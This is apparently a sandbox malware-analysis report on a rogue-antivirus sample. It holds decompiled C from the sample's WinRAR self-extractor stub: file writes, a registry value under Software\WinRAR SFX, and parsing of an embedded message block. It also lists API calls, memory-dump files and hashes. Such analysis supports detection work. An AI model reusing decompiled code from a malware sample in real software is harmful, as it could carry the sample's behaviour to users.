                                                                                                                                                              control_flow_graph 1442 405585-405590 1443 405685-405687 1442->1443 1444 405596-40559b 1442->1444 1445 4055b2-4055b9 1444->1445 1446 40559d-40559e 1444->1446 1449 4055ba-4055c2 1445->1449 1447 4055a0-4055a1 1446->1447 1448 4055a7 1446->1448 1447->1445 1450 4055a3-4055a5 1447->1450 1451 4055a9-4055af GetStdHandle 1448->1451 1452 405601-405616 WriteFile 1449->1452 1453 4055c4-4055c7 1449->1453 1450->1451 1451->1445 1454 405618-40561a 1452->1454 1455 4055c9-4055d5 1453->1455 1456 40561c-405620 1453->1456 1454->1456 1457 40567f-405684 1454->1457 1459 4055d7 1455->1459 1460 4055d9-4055f2 WriteFile 1455->1460 1456->1457 1458 405622-405626 1456->1458 1457->1443 1458->1457 1461 405628-40563c call 403304 1458->1461 1459->1460 1460->1456 1462 4055f4-4055fd 1460->1462 1466 405672-40567a call 403471 1461->1466 1467 40563e-405644 1461->1467 1462->1455 1464 4055ff 1462->1464 1464->1454 1466->1457 1467->1449 1468 40564a-40564c 1467->1468 1468->1449 1470 405652-40566d call 404fdc call 4054ed 1468->1470 1470->1449
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E00405585(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				int _t26;
                                                                                                                                                              				long _t32;
                                                                                                                                                              				int _t35;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				long _t48;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				struct _OVERLAPPED* _t55;
                                                                                                                                                              				void* _t60;
                                                                                                                                                              
                                                                                                                                                              				_t53 = __edx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t60 = __ecx;
                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                              					L25:
                                                                                                                                                              					return _t24;
                                                                                                                                                              				}
                                                                                                                                                              				_t24 =  *(__ecx + 0xc);
                                                                                                                                                              				if(_t24 == 0) {
                                                                                                                                                              					L7:
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t55 = 0;
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						if(_a8 <= 0) {
                                                                                                                                                              							L17:
                                                                                                                                                              							if( *((char*)(_t60 + 0x14)) == 0 ||  *((intOrPtr*)(_t60 + 0xc)) != 0) {
                                                                                                                                                              								L24:
                                                                                                                                                              								 *((char*)(_t60 + 8)) = 1;
                                                                                                                                                              								goto L25;
                                                                                                                                                              							} else {
                                                                                                                                                              								_push(0);
                                                                                                                                                              								_t18 = _t60 + 0x17; // 0x17
                                                                                                                                                              								if(E00403304(0x414c7c, _t18) == 0) {
                                                                                                                                                              									_t22 = _t60 + 0x17; // 0x17
                                                                                                                                                              									_t24 = E00403471(0x414c7c, 0, _t22);
                                                                                                                                                              									goto L24;
                                                                                                                                                              								}
                                                                                                                                                              								_t19 =  &_v8; // 0x9454529
                                                                                                                                                              								_t24 =  *_t19;
                                                                                                                                                              								if(_t24 < _a8 && _t24 > 0) {
                                                                                                                                                              									_t38 = E00404FDC(_t60, _t53);
                                                                                                                                                              									_t21 =  &_v8; // 0x9454529
                                                                                                                                                              									asm("sbb edx, edi");
                                                                                                                                                              									_t24 = E004054ED(_t60, _t38 -  *_t21, _t53, 0);
                                                                                                                                                              								}
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L10;
                                                                                                                                                              						}
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L10:
                                                                                                                                                              							_t48 = _a8 - _t55;
                                                                                                                                                              							_t32 = 0x4000;
                                                                                                                                                              							if(_t48 < 0x4000) {
                                                                                                                                                              								_t32 = _t48;
                                                                                                                                                              							}
                                                                                                                                                              							_t8 =  &_v8; // 0x9454529
                                                                                                                                                              							_t35 = WriteFile( *(_t60 + 4), _a4 + _t55, _t32, _t8, 0);
                                                                                                                                                              							asm("sbb al, al");
                                                                                                                                                              							_t24 =  ~(_t35 - 1) + 1;
                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                              								goto L17;
                                                                                                                                                              							}
                                                                                                                                                              							_t55 = _t55 + 0x4000;
                                                                                                                                                              							if(_t55 < _a8) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							L16:
                                                                                                                                                              							if(_t24 != 0) {
                                                                                                                                                              								goto L24;
                                                                                                                                                              							}
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              						goto L17;
                                                                                                                                                              						L15:
                                                                                                                                                              						_t12 =  &_v8; // 0x9454529
                                                                                                                                                              						_t26 = WriteFile( *(_t60 + 4), _a4, _a8, _t12, 0); // executed
                                                                                                                                                              						asm("sbb al, al");
                                                                                                                                                              						_t24 =  ~(_t26 - 1) + 1;
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t40 = _t24 - 1;
                                                                                                                                                              				if(_t40 == 0) {
                                                                                                                                                              					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                              					L6:
                                                                                                                                                              					 *(_t60 + 4) = _t24;
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              				_t24 = _t40 - 1;
                                                                                                                                                              				if(_t24 != 0) {
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              				_t24 = GetStdHandle(0xfffffff4);
                                                                                                                                                              				goto L6;
                                                                                                                                                              			}














                                                                                                                                                              0x00405585
                                                                                                                                                              0x00405588
                                                                                                                                                              0x0040558e
                                                                                                                                                              0x00405590
                                                                                                                                                              0x00405685
                                                                                                                                                              0x00405687
                                                                                                                                                              0x00405687
                                                                                                                                                              0x00405596
                                                                                                                                                              0x0040559b
                                                                                                                                                              0x004055b2
                                                                                                                                                              0x004055ba
                                                                                                                                                              0x004055ba
                                                                                                                                                              0x004055bc
                                                                                                                                                              0x004055c2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055c7
                                                                                                                                                              0x0040561c
                                                                                                                                                              0x00405620
                                                                                                                                                              0x0040567f
                                                                                                                                                              0x00405680
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405628
                                                                                                                                                              0x00405628
                                                                                                                                                              0x0040562a
                                                                                                                                                              0x0040563c
                                                                                                                                                              0x00405672
                                                                                                                                                              0x0040567a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040567a
                                                                                                                                                              0x0040563e
                                                                                                                                                              0x0040563e
                                                                                                                                                              0x00405644
                                                                                                                                                              0x00405656
                                                                                                                                                              0x0040565b
                                                                                                                                                              0x00405662
                                                                                                                                                              0x00405668
                                                                                                                                                              0x00405668
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405644
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055c9
                                                                                                                                                              0x004055c9
                                                                                                                                                              0x004055cc
                                                                                                                                                              0x004055ce
                                                                                                                                                              0x004055d5
                                                                                                                                                              0x004055d7
                                                                                                                                                              0x004055d7
                                                                                                                                                              0x004055db
                                                                                                                                                              0x004055e9
                                                                                                                                                              0x004055ee
                                                                                                                                                              0x004055f0
                                                                                                                                                              0x004055f2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055f4
                                                                                                                                                              0x004055fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405618
                                                                                                                                                              0x0040561a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040561a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405601
                                                                                                                                                              0x00405602
                                                                                                                                                              0x0040560f
                                                                                                                                                              0x00405614
                                                                                                                                                              0x00405616
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405616
                                                                                                                                                              0x004055ba
                                                                                                                                                              0x0040559d
                                                                                                                                                              0x0040559e
                                                                                                                                                              0x004055a9
                                                                                                                                                              0x004055a9
                                                                                                                                                              0x004055af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055af
                                                                                                                                                              0x004055a0
                                                                                                                                                              0x004055a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055a9
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00409250,?,?,00000000,?,?,0040EA1F,?,?,09454529,?,?), ref: 004055A9
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00004000,)EE*)))*))),00000000,00000000,?,00000000,00000017,00000000,?,00409250,?,?,00000000,?), ref: 004055E9
                                                                                                                                                              • WriteFile.KERNELBASE(?,?,00000000,)EE*)))*))),00000000,?,?,?,00000000,?,00409250,?,?,00000000,?,?), ref: 0040560F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite$Handle
                                                                                                                                                              • String ID: )EE*)))*)))$|LA
                                                                                                                                                              • API String ID: 4209713984-4270601557
                                                                                                                                                              • Opcode ID: fdc6627f0debecb945da0017f8ab991c878f152bbffab1a315f051c33c973c2c
                                                                                                                                                              • Instruction ID: 699b0b7827fd0117c3666501287c6da654fc132a3aa7f220188452afde949247
                                                                                                                                                              • Opcode Fuzzy Hash: fdc6627f0debecb945da0017f8ab991c878f152bbffab1a315f051c33c973c2c
                                                                                                                                                              • Instruction Fuzzy Hash: 9331A371600908BBEF20DA25CD44FBF77AAEB90710F14852BA51AE62D0CB39A901CF19
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1475 40b92f-40b941 1476 40b943-40b949 1475->1476 1477 40b9ab-40b9ad 1475->1477 1476->1477 1478 40b94b-40b980 call 40b901 RegCreateKeyExA 1476->1478 1478->1477 1481 40b982-40b9a5 call 40a384 RegSetValueExA RegCloseKey 1478->1481 1481->1477
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040B92F(void* __esi, char* _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				char _v1036;
                                                                                                                                                              				long _t9;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                              				intOrPtr _t24;
                                                                                                                                                              
                                                                                                                                                              				_t23 =  *0x419f90; // 0x1
                                                                                                                                                              				if(_t23 != 0) {
                                                                                                                                                              					_t24 =  *0x418ed0; // 0x43
                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                              						E0040B901( &_v1036, "C:\WINDOWS");
                                                                                                                                                              						_t9 = RegCreateKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12); // executed
                                                                                                                                                              						if(_t9 == 0) {
                                                                                                                                                              							RegSetValueExA(_v8,  &_v1036, 0, 1, _a4, E0040A384(_t19, _a4) + 1); // executed
                                                                                                                                                              							return RegCloseKey(_v8);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t9;
                                                                                                                                                              			}










                                                                                                                                                              0x0040b93b
                                                                                                                                                              0x0040b941
                                                                                                                                                              0x0040b943
                                                                                                                                                              0x0040b949
                                                                                                                                                              0x0040b957
                                                                                                                                                              0x0040b977
                                                                                                                                                              0x0040b980
                                                                                                                                                              0x0040b99c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b9a5
                                                                                                                                                              0x0040b980
                                                                                                                                                              0x0040b949
                                                                                                                                                              0x0040b9ad

                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\WINDOWS,?,00000000), ref: 0040B977
                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000001,?), ref: 0040B99C
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040B9A5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                              • String ID: C:\WINDOWS$Software\WinRAR SFX
                                                                                                                                                              • API String ID: 1818849710-3781130125
                                                                                                                                                              • Opcode ID: 05266ae45888556376a699e29cc3aa24ec337e56163e73755cf98153071eefaa
                                                                                                                                                              • Instruction ID: c16daf66e710161b54d0a2fba0aebfabfb44711b4487a502893ad39a1af73d28
                                                                                                                                                              • Opcode Fuzzy Hash: 05266ae45888556376a699e29cc3aa24ec337e56163e73755cf98153071eefaa
                                                                                                                                                              • Instruction Fuzzy Hash: DD016DB1400218BEEB21DB90DD81EEB7F2DEB04388F004176BB01F10A1D7B55E55D6AD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1484 409293-4092a6 call 401200 1487 4092ad-4092b5 1484->1487 1488 4092a8 call 40a3ad 1484->1488 1489 4092b7-4092d5 GetModuleFileNameA call 40a3d9 1487->1489 1490 4092dc-40930b call 40a477 call 404ec3 call 405097 1487->1490 1488->1487 1496 4094ca-4094cc 1489->1496 1497 4092db 1489->1497 1501 40931d-409324 1490->1501 1502 40930d-409318 call 405074 1490->1502 1497->1490 1504 409325-409329 1501->1504 1509 4094c9 1502->1509 1506 409401-40942e call 4054ed call 40a1ec 1504->1506 1507 40932f-40934f call 404fdc call 40568a 1504->1507 1518 4094bd-4094c8 call 405074 1506->1518 1519 409434-409451 call 40568a 1506->1519 1516 409354-40935a 1507->1516 1509->1496 1517 409360 1516->1517 1516->1518 1520 409362-40936c 1517->1520 1518->1509 1530 409453-40945c 1519->1530 1531 4094b4-4094ba 1519->1531 1523 409390-409393 1520->1523 1524 40936e-409376 1520->1524 1528 409395-40939d 1523->1528 1529 4093bb-4093c4 1523->1529 1524->1523 1527 409378-40938e call 40a53d 1524->1527 1527->1523 1541 4093c8-4093cd 1527->1541 1528->1529 1533 40939f-4093b5 call 40a53d 1528->1533 1529->1520 1535 4093c6 1529->1535 1530->1531 1534 40945e-409461 1530->1534 1531->1518 1533->1518 1533->1529 1538 409463-40946a 1534->1538 1539 40949e-4094a1 1534->1539 1540 4093d0-4093f1 call 4054ed 1535->1540 1545 409497 1538->1545 1546 40946c-40946f 1538->1546 1542 4094a3-4094a6 1539->1542 1543 4094a8-4094aa 1539->1543 1540->1504 1553 4093f7-4093fb 1540->1553 1541->1540 1542->1543 1550 4094ab 1542->1550 1543->1550 1549 40949b-40949c 1545->1549 1551 409491-409495 1546->1551 1552 409471-409474 1546->1552 1554 4094ae-4094b2 1549->1554 1550->1554 1551->1549 1555 409476-409479 1552->1555 1556 40948b-40948f 1552->1556 1553->1506 1553->1518 1554->1530 1554->1531 1557 409485-409489 1555->1557 1558 40947b-40947d 1555->1558 1556->1549 1557->1549 1558->1550 1559 40947f-409483 1558->1559 1559->1549
                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E00409293(char __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v1040;
                                                                                                                                                              				char _v4144;
                                                                                                                                                              				char _v12336;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                              				void* _t76;
                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				char _t95;
                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				char _t111;
                                                                                                                                                              				void* _t116;
                                                                                                                                                              				void* _t117;
                                                                                                                                                              				void* _t118;
                                                                                                                                                              				void* _t119;
                                                                                                                                                              				void* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				void* _t127;
                                                                                                                                                              
                                                                                                                                                              				_t110 = __edx;
                                                                                                                                                              				_t97 = __ecx;
                                                                                                                                                              				_t95 = __ebx;
                                                                                                                                                              				E00401200(0x302c);
                                                                                                                                                              				 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                              				_push(_a4);
                                                                                                                                                              				_t125 = __ecx;
                                                                                                                                                              				_t65 = E0040A3AD();
                                                                                                                                                              				_t66 =  &_v1040;
                                                                                                                                                              				if(_t65 != 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					E0040A477(_t66, _a4);
                                                                                                                                                              					E00404EC3( &_v4144);
                                                                                                                                                              					_t70 = E00405097( &_v4144,  &_v1040, 0, 1, 0); // executed
                                                                                                                                                              					if(_t70 != 0) {
                                                                                                                                                              						_a4 = _a4 | 0xffffffff;
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						_push(_t95);
                                                                                                                                                              						L7:
                                                                                                                                                              						while(_a4 == 0xffffffff) {
                                                                                                                                                              							_t80 = E00404FDC( &_v4144, _t110); // executed
                                                                                                                                                              							_v12 = _t80;
                                                                                                                                                              							_t82 = E0040568A( &_v4144, _t110,  &_v12336, 0x2000); // executed
                                                                                                                                                              							_v16 = _t82;
                                                                                                                                                              							if(_t82 >= 0x10) {
                                                                                                                                                              								_t122 = 0;
                                                                                                                                                              								while(1) {
                                                                                                                                                              									_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                              									if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A53D(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A53D(_t127 + _t122 - 0x302a, 0x412570, 4) != 0) {
                                                                                                                                                              										_t122 = _t122 + 1;
                                                                                                                                                              										if(_t122 <= _v16 + 0xfffffff0) {
                                                                                                                                                              											continue;
                                                                                                                                                              										} else {
                                                                                                                                                              											L19:
                                                                                                                                                              											E004054ED( &_v4144, _v16 + _v12 - 0x10, 0, 0);
                                                                                                                                                              											_v8 = _v8 + 1;
                                                                                                                                                              											if(_v8 < 0x40) {
                                                                                                                                                              												goto L7;
                                                                                                                                                              											} else {
                                                                                                                                                              												if(_a4 != 0xffffffff) {
                                                                                                                                                              													goto L21;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L42;
                                                                                                                                                              								}
                                                                                                                                                              								_a4 = _t122 + _v12;
                                                                                                                                                              								goto L19;
                                                                                                                                                              							}
                                                                                                                                                              							L42:
                                                                                                                                                              							_t76 = E00405074(_t95,  &_v4144);
                                                                                                                                                              							goto L43;
                                                                                                                                                              						}
                                                                                                                                                              						L21:
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_t95 = 0;
                                                                                                                                                              						 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                              						E004054ED( &_v4144, _a4, _t110, 0);
                                                                                                                                                              						_t75 = E0040A1EC( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                              						 *_t125 = _t75;
                                                                                                                                                              						if(_t75 != 0) {
                                                                                                                                                              							 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                              							_t77 = E0040568A( &_v4144, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                              							_t104 = 0;
                                                                                                                                                              							 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                              							if(_t77 > 0) {
                                                                                                                                                              								while(1) {
                                                                                                                                                              									_t79 =  *_t125;
                                                                                                                                                              									_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                              									_t95 = _t95 + 1;
                                                                                                                                                              									if(_t111 == 0) {
                                                                                                                                                              										goto L41;
                                                                                                                                                              									}
                                                                                                                                                              									if(_t111 != 0x5c) {
                                                                                                                                                              										if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                              											_t111 = 0xc;
                                                                                                                                                              										}
                                                                                                                                                              										goto L39;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                              										if(_t116 == 0) {
                                                                                                                                                              											 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                              											goto L35;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t117 = _t116 - 0x3a;
                                                                                                                                                              											if(_t117 == 0) {
                                                                                                                                                              												 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                              												goto L35;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t118 = _t117 - 0x12;
                                                                                                                                                              												if(_t118 == 0) {
                                                                                                                                                              													 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                              													goto L35;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t119 = _t118 - 4;
                                                                                                                                                              													if(_t119 == 0) {
                                                                                                                                                              														 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                              														goto L35;
                                                                                                                                                              													} else {
                                                                                                                                                              														if(_t119 != 0) {
                                                                                                                                                              															L39:
                                                                                                                                                              															 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                              														} else {
                                                                                                                                                              															 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                              															L35:
                                                                                                                                                              															_t95 = _t95 + 1;
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									_t104 = _t104 + 1;
                                                                                                                                                              									if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                              										continue;
                                                                                                                                                              									}
                                                                                                                                                              									goto L41;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							L41:
                                                                                                                                                              							 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                              							 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                              						}
                                                                                                                                                              						goto L42;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t76 = E00405074(_t95,  &_v4144);
                                                                                                                                                              					}
                                                                                                                                                              					L43:
                                                                                                                                                              				} else {
                                                                                                                                                              					GetModuleFileNameA(0,  &_v1040, 0x400);
                                                                                                                                                              					_t76 = E0040A3D9(_t97,  &_v1040, 0x5c);
                                                                                                                                                              					if(_t76 != 0) {
                                                                                                                                                              						_t66 = _t76 + 1;
                                                                                                                                                              						goto L4;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t76;
                                                                                                                                                              			}




























                                                                                                                                                              0x00409293
                                                                                                                                                              0x00409293
                                                                                                                                                              0x00409293
                                                                                                                                                              0x0040929b
                                                                                                                                                              0x0040929f
                                                                                                                                                              0x004092a3
                                                                                                                                                              0x004092a6
                                                                                                                                                              0x004092a8
                                                                                                                                                              0x004092af
                                                                                                                                                              0x004092b5
                                                                                                                                                              0x004092dc
                                                                                                                                                              0x004092e0
                                                                                                                                                              0x004092ec
                                                                                                                                                              0x00409304
                                                                                                                                                              0x0040930b
                                                                                                                                                              0x0040931d
                                                                                                                                                              0x00409321
                                                                                                                                                              0x00409324
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409325
                                                                                                                                                              0x00409335
                                                                                                                                                              0x0040933a
                                                                                                                                                              0x0040934f
                                                                                                                                                              0x00409354
                                                                                                                                                              0x0040935a
                                                                                                                                                              0x00409360
                                                                                                                                                              0x00409362
                                                                                                                                                              0x00409362
                                                                                                                                                              0x0040936c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409393
                                                                                                                                                              0x004093be
                                                                                                                                                              0x004093c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093c6
                                                                                                                                                              0x004093d0
                                                                                                                                                              0x004093e5
                                                                                                                                                              0x004093ea
                                                                                                                                                              0x004093f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093f7
                                                                                                                                                              0x004093fb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093fb
                                                                                                                                                              0x004093f1
                                                                                                                                                              0x004093c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409393
                                                                                                                                                              0x004093cd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093cd
                                                                                                                                                              0x004094bd
                                                                                                                                                              0x004094c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004094c8
                                                                                                                                                              0x00409401
                                                                                                                                                              0x00409404
                                                                                                                                                              0x00409405
                                                                                                                                                              0x00409410
                                                                                                                                                              0x00409417
                                                                                                                                                              0x00409425
                                                                                                                                                              0x0040942a
                                                                                                                                                              0x0040942e
                                                                                                                                                              0x00409437
                                                                                                                                                              0x00409445
                                                                                                                                                              0x0040944a
                                                                                                                                                              0x0040944e
                                                                                                                                                              0x00409451
                                                                                                                                                              0x00409453
                                                                                                                                                              0x00409453
                                                                                                                                                              0x00409455
                                                                                                                                                              0x00409459
                                                                                                                                                              0x0040945c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409461
                                                                                                                                                              0x004094a1
                                                                                                                                                              0x004094aa
                                                                                                                                                              0x004094aa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409463
                                                                                                                                                              0x00409467
                                                                                                                                                              0x0040946a
                                                                                                                                                              0x00409497
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040946c
                                                                                                                                                              0x0040946c
                                                                                                                                                              0x0040946f
                                                                                                                                                              0x00409491
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409471
                                                                                                                                                              0x00409471
                                                                                                                                                              0x00409474
                                                                                                                                                              0x0040948b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409476
                                                                                                                                                              0x00409476
                                                                                                                                                              0x00409479
                                                                                                                                                              0x00409485
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040947b
                                                                                                                                                              0x0040947d
                                                                                                                                                              0x004094ab
                                                                                                                                                              0x004094ab
                                                                                                                                                              0x0040947f
                                                                                                                                                              0x0040947f
                                                                                                                                                              0x0040949b
                                                                                                                                                              0x0040949b
                                                                                                                                                              0x0040949b
                                                                                                                                                              0x0040947d
                                                                                                                                                              0x00409479
                                                                                                                                                              0x00409474
                                                                                                                                                              0x0040946f
                                                                                                                                                              0x0040946a
                                                                                                                                                              0x004094ae
                                                                                                                                                              0x004094b2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004094b2
                                                                                                                                                              0x00409453
                                                                                                                                                              0x004094b4
                                                                                                                                                              0x004094b6
                                                                                                                                                              0x004094ba
                                                                                                                                                              0x004094ba
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040930d
                                                                                                                                                              0x00409313
                                                                                                                                                              0x00409313
                                                                                                                                                              0x004094c9
                                                                                                                                                              0x004092b7
                                                                                                                                                              0x004092bf
                                                                                                                                                              0x004092ce
                                                                                                                                                              0x004092d5
                                                                                                                                                              0x004092db
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004092db
                                                                                                                                                              0x004092d5
